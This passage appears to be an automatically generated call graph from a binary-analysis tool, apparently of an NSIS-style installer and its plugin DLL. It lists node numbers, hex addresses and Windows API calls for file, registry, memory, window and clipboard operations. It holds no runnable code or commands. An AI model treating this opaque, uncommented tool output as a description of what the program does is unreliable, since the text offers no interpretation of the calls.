CoTaskMemFree 4144->4146 4145->4131 4145->4134 4145->4135 4145->4139 4145->4140 4145->4141 4145->4142 4145->4143 4145->4144 4156 40640b 4145->4156 4161 406484 wsprintfW 4145->4161 4162 40653d lstrcpynW 4145->4162 4146->4145 4153 4067d1 4147->4153 4148 406847 4149 40684c CharPrevW 4148->4149 4151 40686d 4148->4151 4149->4148 4150 40683a CharNextW 4150->4148 4150->4153 4151->4088 4153->4148 4153->4150 4154 406826 CharNextW 4153->4154 4155 406835 CharNextW 4153->4155 4168 405e39 4153->4168 4154->4153 4155->4150 4164 4063aa 4156->4164 4159 40646f 4159->4145 4160 40643f RegQueryValueExW RegCloseKey 4160->4159 4161->4145 4162->4145 4163->4132 4165 4063b9 4164->4165 4166 4063c2 RegOpenKeyExW 4165->4166 4167 4063bd 4165->4167 4166->4167 4167->4159 4167->4160 4169 405e3f 4168->4169 4170 405e55 4169->4170 4171 405e46 CharNextW 4169->4171 4170->4153 4171->4169 4221 40653d lstrcpynW 4172->4221 4174 405f25 4222 405eb7 CharNextW CharNextW 4174->4222 4177 405c69 4177->4093 4177->4094 4178 4067c4 5 API calls 4183 405f3b 4178->4183 4179 405f6c lstrlenW 4180 405f77 4179->4180 4179->4183 4181 405e0c 3 API calls 4180->4181 4184 405f7c GetFileAttributesW 4181->4184 4182 406873 2 API calls 4182->4183 4183->4177 4183->4179 4183->4182 4185 405e58 2 API calls 4183->4185 4184->4177 4185->4179 4186->4098 4188 405e66 4187->4188 4189 405e78 4188->4189 4190 405e6c CharPrevW 4188->4190 4189->4102 4190->4188 4190->4189 4191->4128 4228 406008 GetFileAttributesW 4192->4228 4195 405c2e 4195->4128 4196 405c24 DeleteFileW 4198 405c2a 4196->4198 4197 405c1c RemoveDirectoryW 4197->4198 4198->4195 4199 405c3a SetFileAttributesW 4198->4199 4199->4195 4201 4055ba 4200->4201 4210 40565c 4200->4210 4202 4055d6 lstrlenW 4201->4202 4203 40657a 17 API calls 4201->4203 4204 4055e4 lstrlenW 4202->4204 4205 4055ff 4202->4205 4203->4202 4206 4055f6 lstrcatW 4204->4206 4204->4210 4207 405612 4205->4207 4208 405605 SetWindowTextW 4205->4208 4206->4205 4209 405618 SendMessageW SendMessageW SendMessageW 4207->4209 4207->4210 4208->4207 4209->4210 4210->4128 4212 40631e 4211->4212 4213 406311 4211->4213 4212->4128 4231 406183 4213->4231 4216 405dcd 4215->4216 4217 406889 FindClose 4215->4217 4216->4095 4216->4108 4217->4216 4219 405dd7 4218->4219 4220 405e28 lstrcatW 4218->4220 4219->4113 4220->4219 4221->4174 4223 405ed4 4222->4223 4226 405ee6 4222->4226 4225 405ee1 CharNextW 4223->4225 4223->4226 4224 405f0a 4224->4177 4224->4178 4225->4224 4226->4224 4227 405e39 CharNextW 4226->4227 4227->4226 4229 405c0d 4228->4229 4230 40601a SetFileAttributesW 4228->4230 4229->4195 4229->4196 4229->4197 4230->4229 4232 4061b3 4231->4232 4233 4061d9 GetShortPathNameW 4231->4233 4258 40602d GetFileAttributesW CreateFileW 4232->4258 4235 4062f8 4233->4235 4236 4061ee 4233->4236 4235->4212 4236->4235 4238 4061f6 wsprintfA 4236->4238 4237 4061bd CloseHandle GetShortPathNameW 4237->4235 4239 4061d1 4237->4239 4240 40657a 17 API calls 4238->4240 4239->4233 4239->4235 4241 40621e 4240->4241 4259 40602d GetFileAttributesW CreateFileW 4241->4259 4243 40622b 4243->4235 4244 40623a GetFileSize GlobalAlloc 4243->4244 4245 4062f1 CloseHandle 4244->4245 4246 40625c 4244->4246 4245->4235 4260 4060b0 ReadFile 4246->4260 4251 40627b lstrcpyA 4254 40629d 4251->4254 4252 40628f 4253 405f92 4 API calls 4252->4253 4253->4254 4255 4062d4 SetFilePointer 4254->4255 4267 4060df WriteFile 4255->4267 4258->4237 4259->4243 4261 4060ce 4260->4261 4261->4245 4262 405f92 lstrlenA 4261->4262 4263 405fd3 lstrlenA 4262->4263 4264 405fdb 4263->4264 4265 405fac lstrcmpiA 4263->4265 4264->4251 4264->4252 4265->4264 4266 405fca CharNextA 4265->4266 4266->4263 4268 4060fd GlobalFree 4267->4268 4268->4245 4269 4015c1 4270 402da6 17 API calls 4269->4270 4271 4015c8 4270->4271 4272 405eb7 4 API calls 4271->4272 4277 4015d1 4272->4277 4273 401631 4275 401663 4273->4275 4276 401636 4273->4276 4274 405e39 CharNextW 4274->4277 4280 401423 24 API calls 4275->4280 4296 401423 4276->4296 4277->4273 4277->4274 4286 401617 GetFileAttributesW 4277->4286 4288 405b08 4277->4288 4291 405a6e CreateDirectoryW 4277->4291 4300 405aeb CreateDirectoryW 4277->4300 4282 40165b 4280->4282 4285 40164a SetCurrentDirectoryW 4285->4282 4286->4277 4303 40690a GetModuleHandleA 4288->4303 4292 405abb 4291->4292 4293 405abf GetLastError 4291->4293 4292->4277 4293->4292 4294 405ace SetFileSecurityW 4293->4294 4294->4292 4295 405ae4 GetLastError 4294->4295 4295->4292 4297 40559f 24 API calls 4296->4297 4298 401431 4297->4298 4299 40653d lstrcpynW 4298->4299 4299->4285 4301 405afb 4300->4301 4302 405aff GetLastError 4300->4302 4301->4277 4302->4301 4304 406930 GetProcAddress 4303->4304 4305 406926 4303->4305 4307 405b0f 4304->4307 4309 40689a GetSystemDirectoryW 4305->4309 4307->4277 4308 40692c 4308->4304 4308->4307 4311 4068bc wsprintfW LoadLibraryExW 4309->4311 4311->4308 5002 401c43 5003 402d84 17 API calls 5002->5003 5004 401c4a 5003->5004 5005 402d84 17 API calls 5004->5005 5006 401c57 5005->5006 5007 401c6c 5006->5007 5008 402da6 17 API calls 5006->5008 5009 401c7c 5007->5009 5010 402da6 17 API calls 5007->5010 5008->5007 5011 401cd3 5009->5011 5012 401c87 5009->5012 5010->5009 5013 402da6 17 API calls 5011->5013 5014 402d84 17 API calls 5012->5014 5015 401cd8 5013->5015 5016 401c8c 5014->5016 5017 402da6 17 API calls 5015->5017 5018 402d84 17 API calls 5016->5018 5020 401ce1 FindWindowExW 5017->5020 5019 401c98 5018->5019 5021 401cc3 SendMessageW 5019->5021 5022 401ca5 SendMessageTimeoutW 5019->5022 5023 401d03 5020->5023 5021->5023 5022->5023 5370 404943 5371 404953 5370->5371 5372 404979 5370->5372 5374 404499 18 API calls 5371->5374 5373 404500 8 API calls 5372->5373 5375 404985 5373->5375 5376 404960 SetDlgItemTextW 5374->5376 5376->5372 5232 4028c4 5233 4028ca 5232->5233 5234 4028d2 FindClose 5233->5234 5235 402c2a 5233->5235 5234->5235 5648 716610e1 5654 71661111 5648->5654 5649 716612b0 GlobalFree 5650 71661240 GlobalFree 5650->5654 5651 716611d7 GlobalAlloc 5651->5654 5652 716612ab 5652->5649 5653 7166135a 2 API calls 5653->5654 5654->5649 5654->5650 5654->5651 5654->5652 5654->5653 5655 71661312 2 API calls 5654->5655 5656 7166129a GlobalFree 5654->5656 5657 71661381 lstrcpyW 5654->5657 5658 7166116b GlobalAlloc 5654->5658 5655->5654 5656->5654 5657->5654 5658->5654 5239 4016cc 5240 402da6 17 API calls 5239->5240 5241 4016d2 GetFullPathNameW 5240->5241 5242 4016ec 5241->5242 5243 40170e 5241->5243 5242->5243 5246 406873 2 API calls 5242->5246 5244 401723 GetShortPathNameW 5243->5244 5245 402c2a 5243->5245 5244->5245 5247 4016fe 5246->5247 5247->5243 5249 40653d lstrcpynW 5247->5249 5249->5243 5024 401e4e GetDC 5025 402d84 17 API calls 5024->5025 5026 401e60 GetDeviceCaps MulDiv ReleaseDC 5025->5026 5027 402d84 17 API calls 5026->5027 5028 401e91 5027->5028 5029 40657a 17 API calls 5028->5029 5030 401ece CreateFontIndirectW 5029->5030 5031 402638 5030->5031 5250 716623e9 5251 71662453 5250->5251 5252 7166245e GlobalAlloc 5251->5252 5253 7166247d 5251->5253 5252->5251 5659 4045cf lstrcpynW lstrlenW 5377 402950 5378 402da6 17 API calls 5377->5378 5380 40295c 5378->5380 5379 402972 5382 406008 2 API calls 5379->5382 5380->5379 5381 402da6 17 API calls 5380->5381 5381->5379 5383 402978 5382->5383 5405 40602d GetFileAttributesW CreateFileW 5383->5405 5385 402985 5386 402a3b 5385->5386 5387 4029a0 GlobalAlloc 5385->5387 5388 402a23 5385->5388 5389 402a42 DeleteFileW 5386->5389 5390 402a55 5386->5390 5387->5388 5391 4029b9 5387->5391 5392 4032b4 31 API calls 5388->5392 5389->5390 5406 4034e5 SetFilePointer 5391->5406 5394 402a30 CloseHandle 5392->5394 5394->5386 5395 4029bf 5396 4034cf ReadFile 5395->5396 5397 4029c8 GlobalAlloc 5396->5397 5398 4029d8 5397->5398 5399 402a0c 5397->5399 5401 4032b4 31 API calls 5398->5401 5400 4060df WriteFile 5399->5400 5402 402a18 GlobalFree 5400->5402 5404 4029e5 5401->5404 5402->5388 5403 402a03 GlobalFree 5403->5399 5404->5403 5405->5385 5406->5395 5032 71661774 5033 716617a3 5032->5033 5034 71661bff 22 API calls 5033->5034 5035 716617aa 5034->5035 5036 716617b1 5035->5036 5037 716617bd 5035->5037 5038 71661312 2 API calls 5036->5038 5039 716617c7 5037->5039 5040 716617e4 5037->5040 5046 716617bb 5038->5046 5043 716615dd 3 API calls 5039->5043 5041 7166180e 5040->5041 5042 716617ea 5040->5042 5045 716615dd 3 API calls 5041->5045 5044 71661654 3 API calls 5042->5044 5047 716617cc 5043->5047 5048 716617ef 5044->5048 5045->5046 5049 71661654 3 API calls 5047->5049 5050 71661312 2 API calls 5048->5050 5051 716617d2 5049->5051 5052 716617f5 GlobalFree 5050->5052 5053 71661312 2 API calls 5051->5053 5052->5046 5054 71661809 GlobalFree 5052->5054 5055 716617d8 GlobalFree 5053->5055 5054->5046 5055->5046 5407 401956 5408 402da6 17 API calls 5407->5408 5409 40195d lstrlenW 5408->5409 5410 402638 5409->5410 5254 4014d7 5255 402d84 17 API calls 5254->5255 5256 4014dd Sleep 5255->5256 5258 402c2a 5256->5258 4312 4020d8 4313 40219c 4312->4313 4314 4020ea 4312->4314 4317 401423 24 API calls 4313->4317 4315 402da6 17 API calls 4314->4315 4316 4020f1 4315->4316 4318 402da6 17 API calls 4316->4318 4323 4022f6 4317->4323 4319 4020fa 4318->4319 4320 402110 LoadLibraryExW 4319->4320 4321 402102 GetModuleHandleW 4319->4321 4320->4313 4322 402121 4320->4322 4321->4320 4321->4322 4335 406979 4322->4335 4326 402132 4329 402151 4326->4329 4330 40213a 4326->4330 4327 40216b 4328 40559f 24 API calls 4327->4328 4331 402142 4328->4331 4340 71661817 4329->4340 4332 401423 24 API calls 4330->4332 4331->4323 4333 40218e FreeLibrary 4331->4333 4332->4331 4333->4323 4382 40655f WideCharToMultiByte 4335->4382 4337 406996 4338 40699d GetProcAddress 4337->4338 4339 40212c 4337->4339 4338->4339 4339->4326 4339->4327 4341 7166184a 4340->4341 4383 71661bff 4341->4383 4343 71661851 4344 71661976 4343->4344 4345 71661862 4343->4345 4346 71661869 4343->4346 4344->4331 4433 7166243e 4345->4433 4417 71662480 4346->4417 4351 716618af 4446 71662655 4351->4446 4352 716618cd 4357 716618d3 4352->4357 4358 7166191e 4352->4358 4353 7166187f 4356 71661885 4353->4356 4363 71661890 4353->4363 4354 71661898 4370 7166188e 4354->4370 4443 71662e23 4354->4443 4356->4370 4427 71662b98 4356->4427 4465 71661666 4357->4465 4361 71662655 10 API calls 4358->4361 4371 7166190f 4361->4371 4362 716618b5 4457 71661654 4362->4457 4437 71662810 4363->4437 4368 71661896 4368->4370 4369 71662655 10 API calls 4369->4371 4370->4351 4370->4352 4373 71661965 4371->4373 4471 71662618 4371->4471 4373->4344 4375 7166196f GlobalFree 4373->4375 4375->4344 4379 71661951 4379->4373 4475 716615dd wsprintfW 4379->4475 4381 7166194a FreeLibrary 4381->4379 4382->4337 4478 716612bb GlobalAlloc 4383->4478 4385 71661c26 4479 716612bb GlobalAlloc 4385->4479 4387 71661c31 4388 71661e6b GlobalFree GlobalFree GlobalFree 4387->4388 4392 71661d26 GlobalAlloc 4387->4392 4393 71661ed2 4387->4393 4395 71661d71 lstrcpyW 4387->4395 4396 71661d8f GlobalFree 4387->4396 4399 71661d7b lstrcpyW 4387->4399 4402 71662126 4387->4402 4406 71662067 GlobalFree 4387->4406 4407 716621ae 4387->4407 4411 716612cc 2 API calls 4387->4411 4412 71661dcd 4387->4412 4389 71661e88 4388->4389 4388->4393 4390 7166227e 4389->4390 4391 71661e9d 4389->4391 4389->4393 4390->4393 4394 716622a0 GetModuleHandleW 4390->4394 4391->4393 4482 716612cc 4391->4482 4392->4387 4393->4343 4397 716622c6 4394->4397 4398 716622b1 LoadLibraryW 4394->4398 4395->4399 4396->4387 4486 716616bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4397->4486 4398->4393 4398->4397 4399->4387 4401 71662318 4401->4393 4404 71662325 lstrlenW 4401->4404 4485 716612bb GlobalAlloc 4402->4485 4487 716616bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4404->4487 4406->4387 4407->4393 4413 71662216 lstrcpyW 4407->4413 4408 716622d8 4408->4401 4415 71662302 GetProcAddress 4408->4415 4410 7166233f 4410->4393 4411->4387 4412->4387 4480 7166162f GlobalSize GlobalAlloc 4412->4480 4413->4393 4415->4401 4416 7166212f 4416->4343 4419 71662498 4417->4419 4418 716612cc GlobalAlloc lstrcpynW 4418->4419 4419->4418 4421 716625c1 GlobalFree 4419->4421 4422 71662540 GlobalAlloc WideCharToMultiByte 4419->4422 4423 7166256b GlobalAlloc CLSIDFromString 4419->4423 4426 7166258a 4419->4426 4489 7166135a 4419->4489 4421->4419 4424 7166186f 4421->4424 4422->4421 4423->4421 4424->4353 4424->4354 4424->4370 4426->4421 4493 716627a4 4426->4493 4429 71662baa 4427->4429 4428 71662c4f FindCloseChangeNotification 4432 71662c6d 4428->4432 4429->4428 4431 71662d39 4431->4370 4496 71662b42 4432->4496 4434 71662453 4433->4434 4435 7166245e GlobalAlloc 4434->4435 4436 71661868 4434->4436 4435->4434 4436->4346 4441 71662840 4437->4441 4438 716628ee 4440 716628f4 GlobalSize 4438->4440 4442 716628fe 4438->4442 4439 716628db GlobalAlloc 4439->4442 4440->4442 4441->4438 4441->4439 4442->4368 4444 71662e2e 4443->4444 4445 71662e6e GlobalFree 4444->4445 4500 716612bb GlobalAlloc 4446->4500 4448 716626fa StringFromGUID2 4454 7166265f 4448->4454 4449 7166270b lstrcpynW 4449->4454 4450 716626d8 MultiByteToWideChar 4450->4454 4451 7166271e wsprintfW 4451->4454 4452 71662742 GlobalFree 4452->4454 4453 71662777 GlobalFree 4453->4362 4454->4448 4454->4449 4454->4450 4454->4451 4454->4452 4454->4453 4455 71661312 2 API calls 4454->4455 4501 71661381 4454->4501 4455->4454 4505 716612bb GlobalAlloc 4457->4505 4459 71661659 4460 71661666 2 API calls 4459->4460 4461 71661663 4460->4461 4462 71661312 4461->4462 4463 71661355 GlobalFree 4462->4463 4464 7166131b GlobalAlloc lstrcpynW 4462->4464 4463->4371 4464->4463 4466 71661672 wsprintfW 4465->4466 4467 7166169f lstrcpyW 4465->4467 4470 716616b8 4466->4470 4467->4470 4470->4369 4472 71662626 4471->4472 4474 71661931 4471->4474 4473 71662642 GlobalFree 4472->4473 4472->4474 4473->4472 4474->4379 4474->4381 4476 71661312 2 API calls 4475->4476 4477 716615fe 4476->4477 4477->4373 4478->4385 4479->4387 4481 7166164d 4480->4481 4481->4412 4488 716612bb GlobalAlloc 4482->4488 4484 716612db lstrcpynW 4484->4393 4485->4416 4486->4408 4487->4410 4488->4484 4490 71661361 4489->4490 4491 716612cc 2 API calls 4490->4491 4492 7166137f 4491->4492 4492->4419 4494 716627b2 VirtualAlloc 4493->4494 4495 71662808 4493->4495 4494->4495 4495->4426 4497 71662b4d 4496->4497 4498 71662b52 GetLastError 4497->4498 4499 71662b5d 4497->4499 4498->4499 4499->4431 4500->4454 4502 716613ac 4501->4502 4503 7166138a 4501->4503 4502->4454 4503->4502 4504 71661390 lstrcpyW 4503->4504 4504->4502 4505->4459 5056 404658 5058 404670 5056->5058 5061 40478a 5056->5061 5057 4047f4 5059 4048be 5057->5059 5060 4047fe GetDlgItem 5057->5060 5064 404499 18 API calls 5058->5064 5065 404500 8 API calls 5059->5065 5062 404818 5060->5062 5063 40487f 5060->5063 5061->5057 5061->5059 5066 4047c5 GetDlgItem SendMessageW 5061->5066 5062->5063 5070 40483e SendMessageW LoadCursorW SetCursor 5062->5070 5063->5059 5071 404891 5063->5071 5067 4046d7 5064->5067 5069 4048b9 5065->5069 5089 4044bb KiUserCallbackDispatcher 5066->5089 5068 404499 18 API calls 5067->5068 5073 4046e4 CheckDlgButton 5068->5073 5093 404907 5070->5093 5075 4048a7 5071->5075 5076 404897 SendMessageW 5071->5076 5087 4044bb KiUserCallbackDispatcher 5073->5087 5075->5069 5080 4048ad SendMessageW 5075->5080 5076->5075 5077 4047ef 5090 4048e3 5077->5090 5080->5069 5082 404702 GetDlgItem 5088 4044ce SendMessageW 5082->5088 5084 404718 SendMessageW 5085 404735 GetSysColor 5084->5085 5086 40473e SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5084->5086 5085->5086 5086->5069 5087->5082 5088->5084 5089->5077 5091 4048f1 5090->5091 5092 4048f6 SendMessageW 5090->5092 5091->5092 5092->5057 5096 405b63 ShellExecuteExW 5093->5096 5095 40486d LoadCursorW SetCursor 5095->5063 5096->5095 4506 71662a7f 4507 71662acf 4506->4507 4508 71662a8f VirtualProtect 4506->4508 4508->4507 5411 402b59 5412 402b60 5411->5412 5413 402bab 5411->5413 5415 402d84 17 API calls 5412->5415 5419 402ba9 5412->5419 5414 40690a 5 API calls 5413->5414 5416 402bb2 5414->5416 5418 402b6e 5415->5418 5417 402da6 17 API calls 5416->5417 5420 402bbb 5417->5420 5421 402d84 17 API calls 5418->5421 5420->5419 5422 402bbf IIDFromString 5420->5422 5423 402b7a 5421->5423 5422->5419 5424 402bce 5422->5424 5428 406484 wsprintfW 5423->5428 5424->5419 5429 40653d lstrcpynW 5424->5429 5427 402beb CoTaskMemFree 5427->5419 5428->5419 5429->5427 4618 40175c 4619 402da6 17 API calls 4618->4619 4620 401763 4619->4620 4624 40605c 4620->4624 4622 40176a 4623 40605c 2 API calls 4622->4623 4623->4622 4625 406069 GetTickCount GetTempFileNameW 4624->4625 4626 4060a3 4625->4626 4627 40609f 4625->4627 4626->4622 4627->4625 4627->4626 5430 401d5d 5431 402d84 17 API calls 5430->5431 5432 401d6e SetWindowLongW 5431->5432 5433 402c2a 5432->5433 4900 401ede 4908 402d84 4900->4908 4902 401ee4 4903 402d84 17 API calls 4902->4903 4904 401ef0 4903->4904 4905 401f07 EnableWindow 4904->4905 4906 401efc ShowWindow 4904->4906 4907 402c2a 4905->4907 4906->4907 4909 40657a 17 API calls 4908->4909 4910 402d99 4909->4910 4910->4902 4911 4056de 4912 405888 4911->4912 4913 4056ff GetDlgItem GetDlgItem GetDlgItem 4911->4913 4915 405891 GetDlgItem CreateThread CloseHandle 4912->4915 4916 4058b9 4912->4916 4957 4044ce SendMessageW 4913->4957 4915->4916 4960 405672 5 API calls 4915->4960 4918 4058e4 4916->4918 4919 4058d0 ShowWindow ShowWindow 4916->4919 4920 405909 4916->4920 4917 40576f 4923 405776 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4917->4923 4921 4058f0 4918->4921 4922 405944 4918->4922 4959 4044ce SendMessageW 4919->4959 4927 404500 8 API calls 4920->4927 4925 4058f8 4921->4925 4926 40591e ShowWindow 4921->4926 4922->4920 4932 405952 SendMessageW 4922->4932 4930 4057e4 4923->4930 4931 4057c8 SendMessageW SendMessageW 4923->4931 4933 404472 SendMessageW 4925->4933 4928 405930 4926->4928 4929 40593e 4926->4929 4934 405917 4927->4934 4935 40559f 24 API calls 4928->4935 4936 404472 SendMessageW 4929->4936 4937 4057f7 4930->4937 4938 4057e9 SendMessageW 4930->4938 4931->4930 4932->4934 4939 40596b CreatePopupMenu 4932->4939 4933->4920 4935->4929 4936->4922 4941 404499 18 API calls 4937->4941 4938->4937 4940 40657a 17 API calls 4939->4940 4942 40597b AppendMenuW 4940->4942 4943 405807 4941->4943 4944 405998 GetWindowRect 4942->4944 4945 4059ab TrackPopupMenu 4942->4945 4946 405810 ShowWindow 4943->4946 4947 405844 GetDlgItem SendMessageW 4943->4947 4944->4945 4945->4934 4949 4059c6 4945->4949 4950 405833 4946->4950 4951 405826 ShowWindow 4946->4951 4947->4934 4948 40586b SendMessageW SendMessageW 4947->4948 4948->4934 4952 4059e2 SendMessageW 4949->4952 4958 4044ce SendMessageW 4950->4958 4951->4950 4952->4952 4954 4059ff OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4952->4954 4955 405a24 SendMessageW 4954->4955 4955->4955 4956 405a4d GlobalUnlock SetClipboardData CloseClipboard 4955->4956 4956->4934 4957->4917 4958->4947 4959->4918 5259 4028de 5260 4028e6 5259->5260 5261 4028ea FindNextFileW 5260->5261 5263 4028fc 5260->5263 5262 402943 5261->5262 5261->5263 5265 40653d lstrcpynW 5262->5265 5265->5263 5097 71661979 5099 7166199c 5097->5099 5098 716619e3 5101 71661312 2 API calls 5098->5101 5099->5098 5100 716619d1 GlobalFree 5099->5100 5100->5098 5102 71661b6e GlobalFree GlobalFree 5101->5102 5266 404ce0 5267 404cf0 5266->5267 5268 404d0c 5266->5268 5277 405b81 GetDlgItemTextW 5267->5277 5270 404d12 SHGetPathFromIDListW 5268->5270 5271 404d3f 5268->5271 5273 404d29 SendMessageW 5270->5273 5274 404d22 5270->5274 5272 404cfd SendMessageW 5272->5268 5273->5271 5276 40140b 2 API calls 5274->5276 5276->5273 5277->5272 5660 4063e2 5661 4063e7 5660->5661 5662 4063f2 RegCreateKeyExW 5661->5662 5663 4063ed 5661->5663 5662->5663 5434 401563 5435 402ba4 5434->5435 5438 406484 wsprintfW 5435->5438 5437 402ba9 5438->5437 5103 71662d43 5104 71662d5b 5103->5104 5105 7166162f 2 API calls 5104->5105 5106 71662d76 5105->5106 5439 401968 5440 402d84 17 API calls 5439->5440 5441 40196f 5440->5441 5442 402d84 17 API calls 5441->5442 5443 40197c 5442->5443 5444 402da6 17 API calls 5443->5444 5445 401993 lstrlenW 5444->5445 5446 4019a4 5445->5446 5447 4019e5 5446->5447 5451 40653d lstrcpynW 5446->5451 5449 4019d5 5449->5447 5450 4019da lstrlenW 5449->5450 5450->5447 5451->5449 5107 40166a 5108 402da6 17 API calls 5107->5108 5109 401670 5108->5109 5110 406873 2 API calls 5109->5110 5111 401676 5110->5111 5278 402aeb 5279 402d84 17 API calls 5278->5279 5280 402af1 5279->5280 5281 40657a 17 API calls 5280->5281 5282 40292e 5280->5282 5281->5282 5283 4026ec 5284 402d84 17 API calls 5283->5284 5286 4026fb 5284->5286 5285 402838 5286->5285 5287 402745 ReadFile 5286->5287 5288 4060b0 ReadFile 5286->5288 5289 402785 MultiByteToWideChar 5286->5289 5290 40283a 5286->5290 5291 40610e 5 API calls 5286->5291 5293 4027ab SetFilePointer MultiByteToWideChar 5286->5293 5294 40284b 5286->5294 5287->5285 5287->5286 5288->5286 5289->5286 5296 406484 wsprintfW 5290->5296 5291->5286 5293->5286 5294->5285 5295 40286c SetFilePointer 5294->5295 5295->5285 5296->5285 4961 40176f 4962 402da6 17 API calls 4961->4962 4963 401776 4962->4963 4964 401796 4963->4964 4965 40179e 4963->4965 5000 40653d lstrcpynW 4964->5000 5001 40653d lstrcpynW 4965->5001 4968 4017a9 4970 405e0c 3 API calls 4968->4970 4969 40179c 4972 4067c4 5 API calls 4969->4972 4971 4017af lstrcatW 4970->4971 4971->4969 4982 4017bb 4972->4982 4973 406873 2 API calls 4973->4982 4974 406008 2 API calls 4974->4982 4976 4017cd CompareFileTime 4976->4982 4977 40188d 4978 40559f 24 API calls 4977->4978 4981 401897 4978->4981 4979 40559f 24 API calls 4996 401879 4979->4996 4980 40653d lstrcpynW 4980->4982 4983 4032b4 31 API calls 4981->4983 4982->4973 4982->4974 4982->4976 4982->4977 4982->4980 4986 40657a 17 API calls 4982->4986 4995 405b9d MessageBoxIndirectW 4982->4995 4998 401864 4982->4998 4999 40602d GetFileAttributesW CreateFileW 4982->4999 4984 4018aa 4983->4984 4985 4018be SetFileTime 4984->4985 4987 4018d0 CloseHandle 4984->4987 4985->4987 4986->4982 4988 4018e1 4987->4988 4987->4996 4989 4018e6 4988->4989 4990 4018f9 4988->4990 4992 40657a 17 API calls 4989->4992 4991 40657a 17 API calls 4990->4991 4994 401901 4991->4994 4993 4018ee lstrcatW 4992->4993 4993->4994 4994->4996 4997 405b9d MessageBoxIndirectW 4994->4997 4995->4982 4997->4996 4998->4979 4998->4996 4999->4982 5000->4969 5001->4968 5112 401a72 5113 402d84 17 API calls 5112->5113 5114 401a7b 5113->5114 5115 402d84 17 API calls 5114->5115 5116 401a20 5115->5116 5452 401573 5453 401583 ShowWindow 5452->5453 5454 40158c 5452->5454 5453->5454 5455 402c2a 5454->5455 5456 40159a ShowWindow 5454->5456 5456->5455 5664 4023f4 5665 402da6 17 API calls 5664->5665 5666 402403 5665->5666 5667 402da6 17 API calls 5666->5667 5668 40240c 5667->5668 5669 402da6 17 API calls 5668->5669 5670 402416 GetPrivateProfileStringW 5669->5670 5297 4014f5 SetForegroundWindow 5298 402c2a 5297->5298 5671 401ff6 5672 402da6 17 API calls 5671->5672 5673 401ffd 5672->5673 5674 406873 2 API calls 5673->5674 5675 402003 5674->5675 5677 402014 5675->5677 5678 406484 wsprintfW 5675->5678 5678->5677 5457 401b77 5458 402da6 17 API calls 5457->5458 5459 401b7e 5458->5459 5460 402d84 17 API calls 5459->5460 5461 401b87 wsprintfW 5460->5461 5462 402c2a 5461->5462 5117 40167b 5118 402da6 17 API calls 5117->5118 5119 401682 5118->5119 5120 402da6 17 API calls 5119->5120 5121 40168b 5120->5121 5122 402da6 17 API calls 5121->5122 5123 401694 MoveFileW 5122->5123 5124 4016a7 5123->5124 5130 4016a0 5123->5130 5125 406873 2 API calls 5124->5125 5128 4022f6 5124->5128 5127 4016b6 5125->5127 5126 401423 24 API calls 5126->5128 5127->5128 5129 4062fd 36 API calls 5127->5129 5129->5130 5130->5126 5679 402ffb SetDlgItemTextW 5463 71661058 5465 71661074 5463->5465 5464 716610dd 5465->5464 5466 716615b6 GlobalFree 5465->5466 5467 71661092 5465->5467 5466->5467 5468 716615b6 GlobalFree 5467->5468 5469 716610a2 5468->5469 5470 716610b2 5469->5470 5471 716610a9 GlobalSize 5469->5471 5472 716610b6 GlobalAlloc 5470->5472 5473 716610c7 5470->5473 5471->5470 5474 716615dd 3 API calls 5472->5474 5475 716610d2 GlobalFree 5473->5475 5474->5473 5475->5464 5299 4022ff 5300 402da6 17 API calls 5299->5300 5301 402305 5300->5301 5302 402da6 17 API calls 5301->5302 5303 40230e 5302->5303 5304 402da6 17 API calls 5303->5304 5305 402317 5304->5305 5306 406873 2 API calls 5305->5306 5307 402320 5306->5307 5308 402331 lstrlenW lstrlenW 5307->5308 5309 402324 5307->5309 5311 40559f 24 API calls 5308->5311 5310 40559f 24 API calls 5309->5310 5313 40232c 5309->5313 5310->5313 5312 40236f SHFileOperationW 5311->5312 5312->5309 5312->5313 5680 4019ff 5681 402da6 17 API calls 5680->5681 5682 401a06 5681->5682 5683 402da6 17 API calls 5682->5683 5684 401a0f 5683->5684 5685 401a16 lstrcmpiW 5684->5685 5686 401a28 lstrcmpW 5684->5686 5687 401a1c 5685->5687 5686->5687 5131 401000 5132 401037 BeginPaint GetClientRect 5131->5132 5133 40100c DefWindowProcW 5131->5133 5135 4010f3 5132->5135 5138 401179 5133->5138 5136 401073 CreateBrushIndirect FillRect DeleteObject 5135->5136 5137 4010fc 5135->5137 5136->5135 5139 401102 CreateFontIndirectW 5137->5139 5140 401167 EndPaint 5137->5140 5139->5140 5141 401112 6 API calls 5139->5141 5140->5138 5141->5140 5476 401503 5477 40150b 5476->5477 5479 40151e 5476->5479 5478 402d84 17 API calls 5477->5478 5478->5479 5688 402383 5689 40238a 5688->5689 5692 40239d 5688->5692 5690 40657a 17 API calls 5689->5690 5691 402397 5690->5691 5691->5692 5693 405b9d MessageBoxIndirectW 5691->5693 5693->5692 5142 402c05 SendMessageW 5143 402c2a 5142->5143 5144 402c1f InvalidateRect 5142->5144 5144->5143 5314 402e86 5315 402e8b 5314->5315 5317 402e9f 5315->5317 5318 402ea9 5315->5318 5319 4063aa RegOpenKeyExW 5318->5319 5320 402ed7 5319->5320 5321 402ee7 RegEnumValueW 5320->5321 5322 402f0a 5320->5322 5329 402f81 5320->5329 5321->5322 5323 402f71 RegCloseKey 5321->5323 5322->5323 5324 402f46 RegEnumKeyW 5322->5324 5325 402f4f RegCloseKey 5322->5325 5327 402ea9 6 API calls 5322->5327 5323->5329 5324->5322 5324->5325 5326 40690a 5 API calls 5325->5326 5328 402f5f 5326->5328 5327->5322 5328->5329 5330 402f63 RegDeleteKeyW 5328->5330 5329->5317 5330->5329 5480 404f06 GetDlgItem GetDlgItem 5481 404f58 7 API calls 5480->5481 5487 40517d 5480->5487 5482 404ff2 SendMessageW 5481->5482 5483 404fff DeleteObject 5481->5483 5482->5483 5484 405008 5483->5484 5486 40503f 5484->5486 5488 40657a 17 API calls 5484->5488 5485 40525f 5490 40530b 5485->5490 5499 4052b8 SendMessageW 5485->5499 5523 405170 5485->5523 5489 404499 18 API calls 5486->5489 5487->5485 5519 4051ec 5487->5519 5534 404e54 SendMessageW 5487->5534 5493 405021 SendMessageW SendMessageW 5488->5493 5494 405053 5489->5494 5491 405315 SendMessageW 5490->5491 5492 40531d 5490->5492 5491->5492 5501 405336 5492->5501 5502 40532f 